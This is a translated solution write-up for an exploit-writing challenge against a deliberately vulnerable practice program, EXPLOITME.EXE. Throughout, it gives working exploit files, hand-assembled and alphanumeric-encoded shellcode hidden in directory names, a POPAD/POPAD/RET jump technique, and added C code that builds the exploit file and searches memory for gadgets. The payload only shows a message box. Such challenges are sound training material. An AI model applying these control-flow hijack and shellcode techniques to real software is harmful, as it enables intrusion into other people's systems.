1. Analyze the challenge and find the entry point:
The challenge asks us to write SHELLCODE that pops up a dialog box. The scoring rule, put simply, is that whoever has the fewest non-zero bytes of SHELLCODE in exploit.dat scores highest.

2. Analyze EXPLOITME.EXE:
A quick analysis shows that the program is a standard VC program. Its main flow is: first check the size of exploit.dat; if it is larger than 200H, exit; if it is smaller than 200H, read the file and obtain its actual size; if that size is larger than 84H the program never reaches the vulnerable code path and instead pops up a "fail" dialog.
Also: the program dynamically resolves the addresses of MessageBoxA and MessageBoxW and stores them in global variables.
Because it is a VC program, some code also runs at initialization to obtain the process environment and similar data (for example the current path and the program name).

3. A quick look at the faulting code:
In short, the data from exploit.dat overwrites a function address saved on the stack; the code that follows contains a call [edx], and by then EDX can hold arbitrary data of ours. This step also shows that there is no requirement on the format of the data in exploit.dat: it is not passed through any encoding or conversion. The faulting code:

    mov ecx, ebx
    mov esi, ebp
    mov edx, ecx
    lea edi, [esp+328h+var_280]
    shr ecx, 2
    rep movsd
    mov ecx, edx
    and ecx, 3
    rep movsb
    mov eax, [esp+328h+var_308]
    lea ecx, [esp+328h+var_308]
    call dword ptr [eax]
    mov edx, [esp+328h+var_284]   ; the EDX value read here is already under our control
    lea ecx, [esp+328h+var_284]
    call dword ptr [edx]          ; this is where execution goes to the SHELLCODE
    mov edi, [esp+328h+hHeap]
    mov esi, [esp+328h+hObject]
    mov [esp+328h+var_318], 1

4. Analyze the vulnerability
Simple debugging shows that the four bytes at 80H to 83H of exploit.dat are exactly what ends up controlling EDX. This is what is usually called the jump address position.
Since the jump address serves to point, directly or indirectly, at the SHELLCODE, the choice of its value and the overall solution depend on where the shellcode is stored.

5. Solution approaches:
Analyzing the program and the bug gives three broad approaches:

Approach 1: The challenge author may have left special code somewhere in the EXE, so that after overwriting EDX with just 1 or 2 bytes execution could jump to that code and complete the task. That would make the number of non-zero bytes in exploit.dat very small.
After analyzing the EXE carefully I did not find any such code; my skill is limited, so I have no solution along this line.

Approach 2: Reading the requirements carefully, they only say that exploitme.exe itself must not be modified; they do not say we cannot rename the program, pass it special arguments, run it from a location of our choosing, set OS environment variables, and so on.
Using this approach I eventually built several EXPs; the most elegant one gets the number of non-zero bytes down to just 2.
(If the challenge author does not accept this approach, see approach 3.)

Approach 3: This is the conservative approach: when the program runs, all of the SHELLCODE, the strings and everything else live entirely in exploit.dat.
Comparing approach 2 and approach 3:
If approach 2 is accepted, it is without doubt the one with the fewest non-zero bytes in exploit.dat, because the "Exploit success" string and the instructions can live outside exploit.dat. (Some people may keep part of the string outside exploit.dat and part of the code inside it; I consider that approach 2 as well.)
The key to approach 2: I think the crux is to find a string we control, or partly control, that exists in EXPLOITME.EXE's memory and whose address is also stored somewhere in EXPLOITME.EXE.
Approach 3 is actually very simple and consists of two steps: build the jump, and build the SHELLCODE. By my count, if stack addresses are used, this approach needs between 26 and 33 non-zero bytes in exploit.dat.

6. Building the EXPs
The approach-2 EXPs:
Analyzing the EXE, I first found that at 0040855c (in the EXE's global variable area) a value is stored, normally 00408574, and the data at 00408574 is exactly the path and file name the EXE was started with, e.g. c:\masm32\bin\exploitme.exe, as an ANSI string.
So we set exploit.dat as follows:

00000000h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000010h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000050h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000060h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000080h: 5C 85 ; \

That is, we overwrite only the low bytes of the EDX value held on the stack: EDX was originally 0040XXXX and now becomes 0040855c. So call [edx] is call [0040855c], which is call 00408574, and the bytes at 00408574 are our path C:\............., which, read as code, become the following (this listing is the path with the EXP3 directory name described below):

:u 00408574 l 30
001B:00408574 43       INC EBX              ;C
001B:00408575 3A5C6161 CMP BL,[ECX+61]      ;:\aa
001B:00408579 884257   MOV [EDX+57],AL
001B:0040857C 88424D   MOV [EDX+4D],AL
001B:0040857F 83C24E   ADD EDX,4E
001B:00408582 50       PUSH EAX
001B:00408583 52       PUSH EDX
001B:00408584 83EA41   SUB EDX,41
001B:00408587 83C231   ADD EDX,31
001B:0040858A 52       PUSH EDX
001B:0040858B 50       PUSH EAX
001B:0040858C 83EA43   SUB EDX,43
001B:0040858F 83EA43   SUB EDX,43
001B:00408592 52       PUSH EDX
001B:00408593 58       POP EAX
001B:00408594 FF30     PUSH DWORD PTR [EAX]
001B:00408596 58       POP EAX
001B:00408597 FFD0     CALL EAX
001B:00408599 C3       RET

The advantage of this EXP: the key jump address is taken from the EXE's global variables. Since the EXE does not change and is simple, I tested it on XP SP2/SP3/VISTA and it worked on all of them, so portability is very good (DEP not considered), and the program does not support ASLR.

Now the concrete SHELLCODE. I was worried that someone else might find the same approach and that the challenge author would then compare each person's actual SHELLCODE size within this approach rather than the number of non-zero bytes in exploit.dat, so I wrote four different EXPs based on the same approach; I introduce them one by one below.
(EXP1, EXP2, EXP3, EXP4 and EXP5 are described separately below.)

EXP1: exploit.dat has only two non-zero bytes; the SHELLCODE and the "Exploit success" string are placed entirely in the directory name, which is encoded so that it consists only of letters and digits.
Directory name:
aaB777777RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJImSktbpazd3PhE5Wpt3c00hsSuP1s5Pqx0suPqeuPe8bTUPupS0u8BOS0Qyc0CX40wpPlWpQxCu5PpxS0LKyLLCzL6LrJuPsXRLQpcpUPScRJwpE8ZnVqQPUPJcWpA
Attack method: create the directory above under the root of drive C, put exploit.dat and the EXE in it, and double-click; the correct dialog appears. The directory name is 167 bytes long (not counting C:\).
Supplement: the challenge author might object that if the directory is not on drive C, or the drive letter is a lowercase c, the SHELLCODE breaks. This can be solved, it just needs dedicated analysis, so all directories in this challenge are under the root of C:). As for a lowercase c, that situation does not arise.
Also, EXP1 uses MessageBoxW; the "Exploit success" string is built with PUSH XX00XX00; and EXP1 fixes up ESP so the program exits normally. If a normal exit were not required, the code could be smaller still.
The SHELLCODE of this EXP:

00000000h: 83 C4 50 6A 73 68 65 00 73 00 68 63 00 63 00 68 ; ƒÄPjshe.s.hc.c.h
00000010h: 73 00 75 00 68 74 00 20 00 68 6F 00 69 00 68 70 ; s.u.ht. .ho.i.hp
00000020h: 00 6C 00 68 45 00 78 00 8B DC 83 EC 2C 6A 00 68 ; .l.hE.x.‹Üƒì,j.h
00000030h: 6C 60 40 00 53 6A 00 68 CE 11 40 00 C3          ; l`@.Sj.h?@.

Note that I assembled the code above by hand, so there is no source; the decoder SC was hand-built as well:

:u 00408574 l 30
001B:00408574 43       INC EBX
001B:00408575 3A5C6161 CMP BL,[ECX+61]      ;NOP-like code, swallows ":\aa"
001B:00408579 42       INC EDX
001B:0040857A 37       AAA                  ;NOP-like, for address alignment
001B:0040857B 37       AAA
001B:0040857C 37       AAA
001B:0040857D 37       AAA
001B:0040857E 37       AAA
001B:0040857F 37       AAA
001B:00408580 52       PUSH EDX             ;EDX points near the SC
001B:00408581 59       POP ECX
001B:00408582 6A41     PUSH 41
001B:00408584 58       POP EAX
001B:00408585 50       PUSH EAX
001B:00408586 304130   XOR [ECX+30],AL      ;self-patching starts here
001B:00408589 41       INC ECX
001B:0040858A 6B414151 IMUL EAX,[ECX+41],51
001B:0040858E 324142   XOR AL,[ECX+42]
001B:00408591 324242   XOR AL,[EDX+42]
001B:00408594 304242   XOR [EDX+42],AL
001B:00408597 41       INC ECX
001B:00408598 42       INC EDX
001B:00408599 58       POP EAX
001B:0040859A 50       PUSH EAX
001B:0040859B 384142   CMP [ECX+42],AL
001B:0040859E 754A     JNZ 004085EA

The last line is not accurate, because the code patches itself.
The decoded SC:

:u 004085a0 l 40
001B:004085A0 83C450     ADD ESP,50
001B:004085A3 6A73       PUSH 73
001B:004085A5 6865007300 PUSH 00730065
001B:004085AA 6863006300 PUSH 00630063
001B:004085AF 6873007500 PUSH 00750073
001B:004085B4 6874002000 PUSH 00200074
001B:004085B9 686F006900 PUSH 0069006F
001B:004085BE 6870006C00 PUSH 006C0070
001B:004085C3 6845007800 PUSH 00780045
001B:004085C8 8BDC       MOV EBX,ESP        ;EBX points to "Exploit success"
001B:004085CA 83EC2C     SUB ESP,2C
001B:004085CD 6A00       PUSH 00
001B:004085CF 686C604000 PUSH 0040606C      ; "ExploitMe", the caption reuses a string in the EXE's globals
001B:004085D4 53         PUSH EBX
001B:004085D5 6A00       PUSH 00
001B:004085D7 68CE114000 PUSH 004011CE      ;the API address is hard-coded, but certainly portable
001B:004085DC C3         RET

EXP2: EXP2 uses MessageBoxA and puts "Exploit success" into the directory name. The decoder SC is similar to the one above and is not shown.
Directory name:
aaB777777RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI4sKpNhcqSbMXQQsl2pOsKqf3PQNcm9R03a2pyo5EuDmUspuPV8ISuPAExploit success
Length: 112 bytes.
The decoded SC:

:u 004085a0 l 30
001B:004085A0 33C0         XOR EAX,EAX
001B:004085A2 884152       MOV [ECX+52],AL     ;turns the '\' after "Exploit success\" in the path into 0x00
001B:004085A5 88415C       MOV [ECX+5C],AL     ;turns the '.' in "ExploitMe.exe" into 0x00
001B:004085A8 50           PUSH EAX
001B:004085A9 83C153       ADD ECX,53
001B:004085AC 51           PUSH ECX
001B:004085AD 83E910       SUB ECX,10
001B:004085B0 51           PUSH ECX
001B:004085B1 50           PUSH EAX
001B:004085B2 FF1514854000 CALL [USER32!MessageBoxA]
001B:004085B8 58           POP EAX
001B:004085B9 C3           RET

The important point about this SC is that it found 00408514, a global variable that holds the address of MESSAGEBOXA, which made the SC quite a bit smaller.
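The mechanism behind approach 2 in section 6 (EDX becomes 0040855C, call [edx] lands on the path string at 00408574, and the path runs as code) can be checked with the following added example; it is not code from the original writeup. It models the slice of the EXE's global data the text describes and replays the address arithmetic of the directory-name code listed in section 6, using the 50-byte EXP3 directory name (given under EXP3 below) because that name is raw machine code with no decoder. The fixed addresses 00408514, 0040855C and 00408574 come from the text; the drive letter C:, the lower-case file name exploitme.exe, AL being 0 when the code runs, and the value stored in the MessageBoxA slot are assumptions.

```c
/* Added example (not from the original writeup): a byte-level model of the EXE's
 * global data area, used to replay the address arithmetic of the EXP3 directory-name
 * code. Nothing is executed; the model tracks EDX, EAX and the pushed arguments. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_BASE     0x00408500u   /* modelled slice of .data */
#define IMG_SIZE     0x00C0u
#define P_MSGBOXA    0x00408514u   /* global holding MessageBoxA's address (from the writeup) */
#define P_PATHPTR    0x0040855Cu   /* global holding a pointer to the path (from the writeup) */
#define P_PATH       0x00408574u   /* "C:\<dir>\exploitme.exe", ANSI (from the writeup) */
#define MSGBOXA_FAKE 0x7E4507EAu   /* constructed placeholder, not a real address */

/* The 50-byte EXP3 directory name, copied from the writeup's hex dump. */
static const uint8_t exp3_dir[50] = {
    0x61,0x61,0x88,0x42,0x57,0x88,0x42,0x4D,0x83,0xC2,0x4E,0x50,0x52,0x83,0xEA,0x41,
    0x83,0xC2,0x31,0x52,0x50,0x83,0xEA,0x43,0x83,0xEA,0x43,0x52,0x58,0xFF,0x30,0x58,
    0xFF,0xD0,0xC3,'E','x','p','l','o','i','t',' ','s','u','c','c','e','s','s'
};

static uint8_t image[IMG_SIZE];

struct msgbox_call { uint32_t hwnd, text, caption, type, slot, target; };

static void put32(uint32_t va, uint32_t v)
{
    uint8_t *p = image + (va - IMG_BASE);
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get32(uint32_t va)
{
    const uint8_t *p = image + (va - IMG_BASE);
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* C string at a virtual address inside the modelled slice. */
const char *exp3_string(uint32_t va)
{
    return (const char *)image + (va - IMG_BASE);
}

/* Lay the slice out the way the writeup describes it. */
static void build_image(void)
{
    uint8_t *p = image + (P_PATH - IMG_BASE);
    memset(image, 0, sizeof image);
    put32(P_MSGBOXA, MSGBOXA_FAKE);
    put32(P_PATHPTR, P_PATH);
    memcpy(p, "C:\\", 3);                 p += 3;
    memcpy(p, exp3_dir, sizeof exp3_dir); p += sizeof exp3_dir;
    memcpy(p, "\\exploitme.exe", 15);     /* 14 chars plus the NUL terminator */
}

/* Replay the code that runs from 00408574. "C:\aa" is INC EBX / CMP BL,[ECX+61h]
 * and changes nothing we track; the rest is modelled instruction by instruction. */
struct msgbox_call exp3_resolve(void)
{
    uint32_t edx = P_PATHPTR;   /* value that the exploit.dat bytes 5C 85 put into EDX */
    uint32_t eax = 0;           /* assumed: AL is 0 when the directory-name code runs */
    uint32_t stack[4]; int sp = 0;
    struct msgbox_call c;

    build_image();
    image[edx + 0x57 - IMG_BASE] = (uint8_t)eax;  /* MOV [EDX+57h],AL : the '.' of ".exe" */
    image[edx + 0x4D - IMG_BASE] = (uint8_t)eax;  /* MOV [EDX+4Dh],AL : the '\' after the dir */
    edx += 0x4E;                                  /* ADD EDX,4Eh : -> "exploitme" */
    stack[sp++] = eax;                            /* PUSH EAX (uType) */
    stack[sp++] = edx;                            /* PUSH EDX (caption) */
    edx -= 0x41; edx += 0x31;                     /* SUB EDX,41h / ADD EDX,31h : -> "Exploit success" */
    stack[sp++] = edx;                            /* PUSH EDX (text) */
    stack[sp++] = eax;                            /* PUSH EAX (hWnd) */
    edx -= 0x43; edx -= 0x43;                     /* SUB EDX,43h twice : -> MessageBoxA slot */
    eax = edx;                                    /* PUSH EDX / POP EAX */
    eax = get32(eax);                             /* PUSH DWORD PTR [EAX] / POP EAX */

    c.hwnd = stack[3]; c.text = stack[2]; c.caption = stack[1]; c.type = stack[0];
    c.slot = edx; c.target = eax;                 /* CALL EAX with the four pushed arguments */
    return c;
}

int main(void)
{
    struct msgbox_call c = exp3_resolve();
    printf("slot    %08X -> target %08X\n", c.slot, c.target);
    printf("text    %08X \"%s\"\n", c.text, exp3_string(c.text));
    printf("caption %08X \"%s\"\n", c.caption, exp3_string(c.caption));
    return 0;
}
```

Every constant in the directory name is a distance from 0040855C: +4Eh reaches "exploitme.exe", +3Eh reaches the "Exploit success" tail of the directory name, and the two SUB 43h bring EDX back to the MessageBoxA slot at 00408514, which is why the trick only works while the path has exactly this length.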
EXP3: This EXP is the shortest of the ones above: the directory name is only 50 bytes. It uses Chinese characters and 0xff in the directory name, which means the name is the raw SC itself and no decoder is needed, hence the small size. The downside is that it may not work on a non-Chinese system.
The directory name (its raw bytes, shown as the text they render as):
aaˆBWˆBMƒÂNPRƒêAƒÂ1RPƒêCƒêCRXÿ0XÿÐÃExploit success
Yes, that really is the directory name. In hex:

00000000h: 61 61 88 42 57 88 42 4D 83 C2 4E 50 52 83 EA 41 ; aaˆBWˆBMƒÂNPRƒêA
00000010h: 83 C2 31 52 50 83 EA 43 83 EA 43 52 58 FF 30 58 ; ƒÂ1RPƒêCƒêCRXÿ0X
00000020h: FF D0 C3 45 78 70 6C 6F 69 74 20 73 75 63 63 65 ; ÿÐÃExploit succe
00000030h: 73 73                                           ; ss

Not a single byte is wasted. As ASM it is (note: all typed out by hand in hex, there is no real source code):

:u 00408574 l 30
001B:00408574 43       INC EBX
001B:00408575 3A5C6161 CMP BL,[ECX+61]
001B:00408579 884257   MOV [EDX+57],AL
001B:0040857C 88424D   MOV [EDX+4D],AL
001B:0040857F 83C24E   ADD EDX,4E
001B:00408582 50       PUSH EAX
001B:00408583 52       PUSH EDX
001B:00408584 83EA41   SUB EDX,41
001B:00408587 83C231   ADD EDX,31
001B:0040858A 52       PUSH EDX
001B:0040858B 50       PUSH EAX
001B:0040858C 83EA43   SUB EDX,43
001B:0040858F 83EA43   SUB EDX,43           ;EDX now points at the slot holding MSGBOXA's address
001B:00408592 52       PUSH EDX
001B:00408593 58       POP EAX
001B:00408594 FF30     PUSH DWORD PTR [EAX]
001B:00408596 58       POP EAX
001B:00408597 FFD0     CALL EAX
001B:00408599 C3       RET

I will not go through the code in detail. It also uses MessageBoxA, and I locate the slot holding that API's address through EDX as well: EDX is normally 0040855c and the API address is stored at 00408514, so subtracting from EDX twice lands exactly there.

EXP4: This EXP puts some instructions in the directory name, some in exploit.dat, and "Exploit success" in the command-line arguments, combining several methods. exploit.dat has 10 non-zero bytes.
Contents of exploit.dat:

00000000h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000010h: 00 00 00 00 00 00 00 00 CE 11 40 00 00 00 00 00 ; ........?@.....   ;004011CE is the API
00000020h: 00 0B 02 00 6C 60 40 00 00 00 00 00 00 00 00 00 ; ....l`@.........  ;00020B00 points at the command-line argument in the process environment block, 0040606C at the ExploitMe string in the globals
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000050h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000060h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000080h: 5C 85                                           ; \

We name the directory:
C:\aaaa面aaaaaaaaaaaaaaaaaaaaaaaa1234
and run the program like this:
C:\aaaa面aaaaaaaaaaaaaaaaaaaaaaaa1234>exploitme Exploit success

Analysis: what 5C85 means was explained above. With the directory name c:\aaaa面..................., the disassembly is:

001B:00408574 43       INC EBX
001B:00408575 3A5C6161 CMP BL,[ECX+61]
              61       POPAD
              61       POPAD
              C3       RET
              XXXXX

That is, the "aa" after c:\ acts as a NOP-like instruction, and cmp bl,[ecx+61] is safe because ECX is always 0012XXXX or 0013XXXX, somewhere in the stack, so it cannot fault. The key part is the "aa面" that follows: it is popad, popad, ret (面 is C3 E6 in GBK, and C3 is RET), which is used to locate the SHELLCODE.
The 00020B00 in exploit.dat also needs a word: it contains two 00 bytes. I padded the directory name with a long run of aaaaaaa.... so that the address of "Exploit success" in the environment block is guaranteed to contain two 00 bytes.
EXP4 does have an unstable spot, namely the use of 00020b00: that is an unreliable hard-coded address, so it fails on some machines.

7. EXP5, the approach-3 EXP:
Approach 3 was analyzed above; in short, everything must be in exploit.dat. Mine is:

00000000h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000010h: 00 00 00 00 00 00 00 00 CE 11 40 00 00 00 00 00 ; ........?@.....
00000020h: A4 FC 13 00 6C 60 40 00 00 00 00 00 45 00 78 00 ; ¤ü..l`@.....E.x.
00000030h: 70 00 6C 00 6F 00 69 00 74 00 20 00 73 00 75 00 ; p.l.o.i.t. .s.u.
00000040h: 63 00 63 00 65 00 73 00 73 00 00 00 00 00 00 00 ; c.c.e.s.s.......
00000050h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000060h: 00 00 00 00 00 00 00 00 00 00 00 00 61 61 C3 00 ; ............aa?
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 E4 FC 13 00 ; ............äü..
00000080h: F4 FC 13 00                                     ; ôü..

Personally I think there is not much to analyze in this approach, and the scores will not differ much either (26-33 bytes). As for portability, it uses 0013xxxx in three places, and on some machines this is always 0012xxxx, so portability is not great.
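As an added example (not from the original writeup), the following code builds the EXP5 exploit.dat above from one stack base, counts the non-zero bytes the challenge scores, and follows the pointer chain that call [edx] walks. The offsets and the two EXE addresses 004011CE and 0040606C are taken from the dump; the stack base 0013FC78 is the one that reproduces the dump's bytes, and the second base 0012FC78 stands in for the machines mentioned above where the stack sits at 0012xxxx.

```c
/* Added example (not from the original writeup): build the approach-3 exploit.dat
 * of EXP5 from a single stack base and check the pointer chain it depends on.
 * Everything here is a byte-level model; nothing is executed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DAT_SIZE    0x84u
#define API_RET     0x004011CEu   /* code in the EXE that reaches MessageBoxW (from the writeup) */
#define CAPTION_VA  0x0040606Cu   /* "ExploitMe" in the EXE's globals (from the writeup) */
#define OFF_RET     0x18u   /* dword the gadget's RET pops */
#define OFF_HWND    0x1Cu
#define OFF_TEXT    0x20u   /* -> the UTF-16 string below, once the file sits on the stack */
#define OFF_CAPTION 0x24u
#define OFF_TYPE    0x28u
#define OFF_STRING  0x2Cu   /* "Exploit success" as UTF-16LE */
#define OFF_GADGET  0x6Cu   /* 61 61 C3 : POPAD / POPAD / RET */
#define OFF_PTR     0x7Cu   /* dword read by call [edx] */
#define OFF_EDX     0x80u   /* the four bytes that become EDX */

static void put32(uint8_t *d, unsigned off, uint32_t v)
{
    d[off] = (uint8_t)v;             d[off + 1] = (uint8_t)(v >> 8);
    d[off + 2] = (uint8_t)(v >> 16); d[off + 3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *d, unsigned off)
{
    return d[off] | (uint32_t)d[off + 1] << 8 | (uint32_t)d[off + 2] << 16 | (uint32_t)d[off + 3] << 24;
}

/* base: stack address at which the file contents sit when call [edx] runs */
void build_exp5(uint8_t *dat, uint32_t base)
{
    const char *s = "Exploit success";
    memset(dat, 0, DAT_SIZE);
    put32(dat, OFF_RET,     API_RET);
    put32(dat, OFF_TEXT,    base + OFF_STRING);
    put32(dat, OFF_CAPTION, CAPTION_VA);
    for (unsigned i = 0; s[i]; i++)            /* UTF-16LE; the high bytes stay 0 */
        dat[OFF_STRING + 2 * i] = (uint8_t)s[i];
    dat[OFF_GADGET] = 0x61; dat[OFF_GADGET + 1] = 0x61; dat[OFF_GADGET + 2] = 0xC3;
    put32(dat, OFF_PTR, base + OFF_GADGET);
    put32(dat, OFF_EDX, base + OFF_PTR);
}

/* The score the challenge counts. */
unsigned count_nonzero(const uint8_t *d, unsigned n)
{
    unsigned c = 0;
    for (unsigned i = 0; i < n; i++) c += d[i] != 0;
    return c;
}

/* Follow what the CPU does when the file actually landed at `actual`:
 * EDX = dat[80h]; call [EDX]. Returns the file offset the call lands on, or -1
 * if a hop leaves the file or the bytes there are not the gadget. */
int resolve_call(const uint8_t *dat, uint32_t actual)
{
    uint32_t edx = get32(dat, OFF_EDX);
    if (edx < actual || edx + 4 > actual + DAT_SIZE) return -1;
    uint32_t target = get32(dat, edx - actual);
    if (target < actual || target + 3 > actual + DAT_SIZE) return -1;
    unsigned off = target - actual;
    if (dat[off] != 0x61 || dat[off + 1] != 0x61 || dat[off + 2] != 0xC3) return -1;
    return (int)off;
}

/* Wrappers: build for `built_for`, evaluate on a machine whose stack is at `actual`. */
unsigned exp5_nonzero(uint32_t built_for)
{
    uint8_t d[DAT_SIZE]; build_exp5(d, built_for); return count_nonzero(d, DAT_SIZE);
}
uint32_t exp5_dword(uint32_t built_for, unsigned off)
{
    uint8_t d[DAT_SIZE]; build_exp5(d, built_for); return get32(d, off);
}
int exp5_target(uint32_t built_for, uint32_t actual)
{
    uint8_t d[DAT_SIZE]; build_exp5(d, built_for); return resolve_call(d, actual);
}

int main(void)
{
    uint8_t d[DAT_SIZE];
    build_exp5(d, 0x0013FC78u);
    for (unsigned i = 0; i < DAT_SIZE; i++)
        printf("%02X%c", d[i], (i & 15) == 15 ? '\n' : ' ');
    printf("\nnon-zero bytes: %u\n", count_nonzero(d, DAT_SIZE));
    printf("call lands on offset %d with the stack at 0013FC78, %d with it at 0012FC78\n",
           resolve_call(d, 0x0013FC78u), resolve_call(d, 0x0012FC78u));
    return 0;
}
```

The 33 non-zero bytes are 3 for the API address, 3 each for the text and caption pointers, 15 for the string, 3 for the gadget and 3 each for the two stack pointers at 7Ch and 80h. The three stack-derived dwords are exactly the ones that break when the file lands at 0012xxxx instead of 0013xxxx, which is the portability problem noted above.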
Final summary:
On portability: I think any hard-coded stack address such as 0012XXXX or 0013XXXX is unreliable, whereas addresses like 004011CE or 0040606C should be very portable because this program is simple; in real-world use, 0040XXXX addresses would be specific to the EXE version.
Can my approach-3 EXP, currently 33 bytes, be reduced further? I think the only places with room are 6CH, 7CH and 80H, i.e. in how cleverly the jump is built and the SC located.
So the non-zero byte count for approach 3 should be reckoned as: 15 bytes of string + 3 bytes of API address + 6 bytes for the two string pointers = 24, plus at least 2 bytes for the jump, so approach 3 needs at least 26 bytes!
Anything under 26 bytes must be using approach 2 or 1.
As for portability, with approach 3 the string (Exploit success) is generally located through a 0013XXXX address, so portability is not really on the table.

Is there a truly portable method? Apart from approach 2, there is, at least relatively speaking. My analysis:
First find, in memory, an instruction sequence that can locate the exploit.dat data on the stack, for example the POPAD, POPAD, RET I keep using. Say that sequence is 6161c3. Search memory for it, say in the code section of KERNEL32.DLL, and suppose it is found at 77112233. Then search the readable regions of memory for the value 77112233; suppose it is found at 78112233. Set the dword at 80H to 78112233: CALL [EDX] is then call [78112233], i.e. call 77112233, which jumps straight to POPAD, POPAD, RET, and after the RET we are in the SC.
Then build "Exploit success" in the SC with the push 00xx00xx method I used earlier, and the whole thing is very portable!! This method has one problem, though: although the challenge says XP SP3, the patch level still matters.
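The two-stage search in the last paragraph, as an added example that is not part of the original writeup: it runs over a constructed buffer standing in for a module's readable pages, with the base 77112000 and the offsets chosen so the gadget sits at 77112233, the illustrative address used in the text. On a real system the same two scans would be run over the loaded module's readable pages.

```c
/* Added example (not from the original writeup): stage 1 finds the POPAD/POPAD/RET
 * gadget, stage 2 finds a readable dword holding the gadget's address; that dword's
 * address is what goes into exploit.dat at 80h so that call [edx] reaches the gadget. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static const uint8_t GADGET[3] = { 0x61, 0x61, 0xC3 };   /* POPAD ; POPAD ; RET */

/* Virtual address of the first occurrence of needle in the image, or 0. */
uint32_t find_bytes(const uint8_t *img, size_t len, uint32_t base,
                    const uint8_t *needle, size_t nlen)
{
    for (size_t i = 0; i + nlen <= len; i++)
        if (memcmp(img + i, needle, nlen) == 0) return base + (uint32_t)i;
    return 0;
}

/* Address of a readable dword whose value is va. Every byte offset is tried:
 * call [edx] reads an unaligned dword just as happily as an aligned one. */
uint32_t find_pointer_to(const uint8_t *img, size_t len, uint32_t base, uint32_t va)
{
    uint8_t le[4] = { (uint8_t)va, (uint8_t)(va >> 8), (uint8_t)(va >> 16), (uint8_t)(va >> 24) };
    return find_bytes(img, len, base, le, 4);
}

/* Both stages. Returns the value for exploit.dat[80h], or 0 if either stage fails;
 * gadget_out receives the gadget's address (0 if not found). */
uint32_t choose_edx(const uint8_t *img, size_t len, uint32_t base, uint32_t *gadget_out)
{
    uint32_t g = find_bytes(img, len, base, GADGET, sizeof GADGET);
    if (gadget_out) *gadget_out = g;
    if (g == 0) return 0;
    return find_pointer_to(img, len, base, g);
}

/* Constructed image: 0x400 bytes of NOP filler with the gadget at +0x233 and,
 * unless omitted, a little-endian pointer to it at +0x1A0 (deliberately unaligned). */
#define IMG_BASE 0x77112000u
#define IMG_LEN  0x400u
static void make_image(uint8_t *img, int with_pointer)
{
    memset(img, 0x90, IMG_LEN);
    memcpy(img + 0x233, GADGET, sizeof GADGET);
    if (with_pointer) {
        uint32_t g = IMG_BASE + 0x233;
        img[0x1A0] = (uint8_t)g;         img[0x1A1] = (uint8_t)(g >> 8);
        img[0x1A2] = (uint8_t)(g >> 16); img[0x1A3] = (uint8_t)(g >> 24);
    }
}

uint32_t demo_edx(int with_pointer)
{
    uint8_t img[IMG_LEN];
    make_image(img, with_pointer);
    return choose_edx(img, IMG_LEN, IMG_BASE, NULL);
}

uint32_t demo_gadget(void)
{
    uint8_t img[IMG_LEN]; uint32_t g = 0;
    make_image(img, 1);
    choose_edx(img, IMG_LEN, IMG_BASE, &g);
    return g;
}

int main(void)
{
    printf("gadget at %08X, dword pointing at it at %08X (0 = not found)\n",
           demo_gadget(), demo_edx(1));
    printf("without a pointer in the image: %08X\n", demo_edx(0));
    return 0;
}
```

The second scan is the one that usually decides whether the method works at all: a gadget is easy to find, a dword that happens to hold its address is not, and both results move with the DLL's patch level, which is the caveat the paragraph above ends on.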